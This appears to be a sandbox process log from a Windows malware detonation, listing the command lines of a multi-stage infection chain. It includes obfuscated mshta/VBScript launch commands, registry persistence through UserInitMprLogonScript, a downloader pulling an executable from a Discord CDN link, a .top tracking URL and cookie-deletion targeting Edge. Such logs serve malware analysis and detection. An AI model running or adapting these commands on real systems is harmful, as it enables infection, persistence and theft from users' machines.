C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Users\Admin\AppData\Roaming\3194562.exe
"C:\Users\Admin\AppData\Roaming\3194562.exe"
C:\Users\Admin\AppData\Roaming\3945035.exe
"C:\Users\Admin\AppData\Roaming\3945035.exe"
C:\Users\Admin\AppData\Roaming\3474119.exe
"C:\Users\Admin\AppData\Roaming\3474119.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4984 -s 2396
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 600 -p 6060 -ip 6060
C:\Users\Admin\AppData\Local\Temp\A8C4.exe
C:\Users\Admin\AppData\Local\Temp\A8C4.exe
C:\Users\Admin\AppData\Local\Temp\is-SS4QK.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-SS4QK.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6060 -s 784
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Users\Admin\AppData\Local\Temp\B170.exe
C:\Users\Admin\AppData\Local\Temp\B170.exe
C:\Users\Admin\AppData\Local\Temp\is-KG9O2.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-KG9O2.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Users\Admin\AppData\Local\Temp\is-Q18BB.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q18BB.tmp\Setup.tmp" /SL5="$10562,17345880,721408,C:\Users\Admin\AppData\Local\Temp\is-KG9O2.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6976 -ip 6976
C:\Users\Admin\Documents\KuXpHUaLbM1TdWQ5WTxiUJ9E.exe
"C:\Users\Admin\Documents\KuXpHUaLbM1TdWQ5WTxiUJ9E.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 6492 -ip 6492
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-S4STK.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Users\Admin\AppData\Local\Temp\C1DC.exe
C:\Users\Admin\AppData\Local\Temp\C1DC.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 460
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-S4STK.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6492 -s 280
C:\Users\Admin\AppData\Local\Temp\D015.exe
C:\Users\Admin\AppData\Local\Temp\D015.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5156 -ip 5156
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding CBCA5D7D849EEF7D36EAEC2EF06B5D9E C
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5156 -s 2428
C:\Users\Admin\Documents\owFqBL4Mq_bjxI_jtXSsUZJg.exe
"C:\Users\Admin\Documents\owFqBL4Mq_bjxI_jtXSsUZJg.exe"
C:\Users\Admin\Documents\_JJo0aCHq8mE0uPnZ_nQeUca.exe
"C:\Users\Admin\Documents\_JJo0aCHq8mE0uPnZ_nQeUca.exe"
C:\Users\Admin\Documents\bqy_6J47oiL9FnZalOOXA5IJ.exe
"C:\Users\Admin\Documents\bqy_6J47oiL9FnZalOOXA5IJ.exe"
C:\Users\Admin\Documents\R4xZX1luwUPq9VfxwZ2Y3Xlg.exe
"C:\Users\Admin\Documents\R4xZX1luwUPq9VfxwZ2Y3Xlg.exe"
C:\Users\Admin\Documents\9tgLoG72Gq9TsKPb2rKWvimJ.exe
"C:\Users\Admin\Documents\9tgLoG72Gq9TsKPb2rKWvimJ.exe"
C:\Users\Admin\Documents\R9zIv64hHexXpZ5PXOJdUYDR.exe
"C:\Users\Admin\Documents\R9zIv64hHexXpZ5PXOJdUYDR.exe"
C:\Users\Admin\Documents\qi0VkDxuslJp96BClqOxZQV1.exe
"C:\Users\Admin\Documents\qi0VkDxuslJp96BClqOxZQV1.exe"
C:\Users\Admin\Documents\ZHYhIavsfxgIeCf6Z3BlV1bl.exe
"C:\Users\Admin\Documents\ZHYhIavsfxgIeCf6Z3BlV1bl.exe"
C:\Users\Admin\Documents\S1uFCzZAnSugBlQxsoLrJwEx.exe
"C:\Users\Admin\Documents\S1uFCzZAnSugBlQxsoLrJwEx.exe"
C:\Users\Admin\Documents\9EVme0l7Ztgc0PCMbsYEDYAC.exe
"C:\Users\Admin\Documents\9EVme0l7Ztgc0PCMbsYEDYAC.exe"
C:\Users\Admin\Documents\BDPL6E6_jeDoIFJmNx5sQMo9.exe
"C:\Users\Admin\Documents\BDPL6E6_jeDoIFJmNx5sQMo9.exe"
C:\Users\Admin\Documents\b_pTz2xC6r5VAg3un6goqCSz.exe
"C:\Users\Admin\Documents\b_pTz2xC6r5VAg3un6goqCSz.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Users\Admin\Documents\efkymguUelvwC2af_1bU5zZ0.exe
"C:\Users\Admin\Documents\efkymguUelvwC2af_1bU5zZ0.exe"
C:\Users\Admin\Documents\kz7bTmxYNsyXSGVl8HVLBc7z.exe
"C:\Users\Admin\Documents\kz7bTmxYNsyXSGVl8HVLBc7z.exe"
C:\Users\Admin\Documents\0RpCtOzy5DCg5JBxs7Ep8iOY.exe
"C:\Users\Admin\Documents\0RpCtOzy5DCg5JBxs7Ep8iOY.exe"
C:\Users\Admin\Documents\PXG3Q19rY_ZS613IIsY4GFX5.exe
"C:\Users\Admin\Documents\PXG3Q19rY_ZS613IIsY4GFX5.exe"
C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe
"C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe"
C:\Users\Admin\Documents\xP8RH8dal6K2p0l5NBxp1SE1.exe
"C:\Users\Admin\Documents\xP8RH8dal6K2p0l5NBxp1SE1.exe"
C:\Users\Admin\Documents\8clEFitrHndhHr1e_qlt20Dg.exe
"C:\Users\Admin\Documents\8clEFitrHndhHr1e_qlt20Dg.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F6C5.tmp\F6C6.tmp\F6C7.bat C:\Users\Admin\Documents\R9zIv64hHexXpZ5PXOJdUYDR.exe"
C:\Users\Admin\Documents\Q0u4QqQuwOtV8hpGxmRkcW7R.exe
"C:\Users\Admin\Documents\Q0u4QqQuwOtV8hpGxmRkcW7R.exe"
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Users\Admin\Documents\Uhe4_ggcq91zJxxmcC9oKfbz.exe
"C:\Users\Admin\Documents\Uhe4_ggcq91zJxxmcC9oKfbz.exe"
C:\Users\Admin\Documents\OHaRPl9eF_Obb3ELJ2eCrs1S.exe
"C:\Users\Admin\Documents\OHaRPl9eF_Obb3ELJ2eCrs1S.exe"
C:\Users\Admin\Documents\bAyNyrmy2ppVz_z1MLKe0uRF.exe
"C:\Users\Admin\Documents\bAyNyrmy2ppVz_z1MLKe0uRF.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\bAyNyrmy2ppVz_z1MLKe0uRF.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\bAyNyrmy2ppVz_z1MLKe0uRF.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533762 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Users\Admin\AppData\Local\Temp\is-67VSD.tmp\8clEFitrHndhHr1e_qlt20Dg.tmp
"C:\Users\Admin\AppData\Local\Temp\is-67VSD.tmp\8clEFitrHndhHr1e_qlt20Dg.tmp" /SL5="$10608,138429,56832,C:\Users\Admin\Documents\8clEFitrHndhHr1e_qlt20Dg.exe"
C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe
"C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5180 -ip 5180
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 8016 -ip 8016
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\bAyNyrmy2ppVz_z1MLKe0uRF.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\bAyNyrmy2ppVz_z1MLKe0uRF.exe" ) do taskkill -im "%~NXj" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4304 -ip 4304
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 7740 -ip 7740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 328
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E9B7D517B45ADDBF0B0F2F3878C5BC2B C
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "bAyNyrmy2ppVz_z1MLKe0uRF.exe" -f
C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe
Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8016 -s 276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5180 -s 292
C:\Users\Admin\Documents\qi0VkDxuslJp96BClqOxZQV1.exe
"C:\Users\Admin\Documents\qi0VkDxuslJp96BClqOxZQV1.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7740 -s 276
C:\Users\Admin\Documents\b_pTz2xC6r5VAg3un6goqCSz.exe
C:\Users\Admin\Documents\b_pTz2xC6r5VAg3un6goqCSz.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF ""-PMrvgB7ejl2YIjc3PC8aTZbo"" == """" for %j iN (""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\AppData\Local\Temp\2115.exe
C:\Users\Admin\AppData\Local\Temp\2115.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "-PMrvgB7ejl2YIjc3PC8aTZbo" == "" for %j iN ("C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" ) do taskkill -im "%~NXj" -f
C:\Users\Admin\AppData\Local\Temp\F6C5.tmp\F6C6.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\F6C5.tmp\F6C6.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 7520 -ip 7520
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Users\Admin\AppData\Roaming\2038972.exe
"C:\Users\Admin\AppData\Roaming\2038972.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 2368 -ip 2368
C:\Users\Admin\AppData\Roaming\6253116.exe
"C:\Users\Admin\AppData\Roaming\6253116.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 796
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7384 -ip 7384
C:\Users\Admin\AppData\Roaming\8206888.exe
"C:\Users\Admin\AppData\Roaming\8206888.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2368 -s 296
C:\Users\Admin\AppData\Local\Temp\F6C5.tmp\F6C6.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\F6C5.tmp\F6C6.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Users\Admin\AppData\Roaming\3635818.exe
"C:\Users\Admin\AppData\Roaming\3635818.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 7588 -ip 7588
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7384 -s 272
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-SS4QK.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-SS4QK.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533762 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Users\Admin\AppData\Local\Temp\F6C5.tmp\F6C6.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\F6C5.tmp\F6C6.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=721
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Users\Admin\AppData\Local\Temp\4BEE.exe
C:\Users\Admin\AppData\Local\Temp\4BEE.exe
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding B22C46F76184C1087E488425E4AA0072
C:\Users\Admin\AppData\Local\Temp\is-S4STK.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-S4STK.tmp\{app}\vdi_compiler"
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 292
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 1060 -ip 1060
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Program Files\Common Files\MLZGUBILYF\ultramediaburner.exe
"C:\Program Files\Common Files\MLZGUBILYF\ultramediaburner.exe" /VERYSILENT
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 448 -p 2424 -ip 2424
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5808 -ip 5808
C:\Users\Admin\AppData\Local\Temp\14322\DES6_6_6.exe
DES6_6_6.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 7812 -ip 7812
C:\Users\Admin\AppData\Local\Temp\is-QTUI2.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-QTUI2.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 272
C:\Users\Admin\AppData\Local\Temp\F6C5.tmp\F6C6.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\F6C5.tmp\F6C6.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\HwWYSzK.F2,zgr
C:\Users\Admin\AppData\Local\Temp\is-6481D.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6481D.tmp\ultramediaburner.tmp" /SL5="$70024,281924,62464,C:\Program Files\Common Files\MLZGUBILYF\ultramediaburner.exe" /VERYSILENT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 7508 -ip 7508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7812 -s 276
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Local\Temp\2b-2d576-0af-efe9c-05b4a607072c7\Byjaevyfona.exe
"C:\Users\Admin\AppData\Local\Temp\2b-2d576-0af-efe9c-05b4a607072c7\Byjaevyfona.exe"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7508 -s 276
C:\Users\Admin\AppData\Local\Temp\2f-f3548-972-255a7-0e9bda818cb94\Dozhopaejuty.exe
"C:\Users\Admin\AppData\Local\Temp\2f-f3548-972-255a7-0e9bda818cb94\Dozhopaejuty.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{6aead40f-9a52-764a-bbde-4c732aca755e}\oemvista.inf" "9" "4d14a44ff" "0000000000000140" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 6404 -ip 6404
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 2284
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=721
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f41846f8,0x7ff9f4184708,0x7ff9f4184718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000164" "a219"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:8
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 9F33BB0CB4746FB4A7EE7E69F875189F C
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3024 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3032 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4520 /prefetch:1
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\Documents\kz7bTmxYNsyXSGVl8HVLBc7z.exe
"C:\Users\Admin\Documents\kz7bTmxYNsyXSGVl8HVLBc7z.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 624 -p 4000 -ip 4000
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4000 -s 2388
C:\Windows\system32\svchost.exe
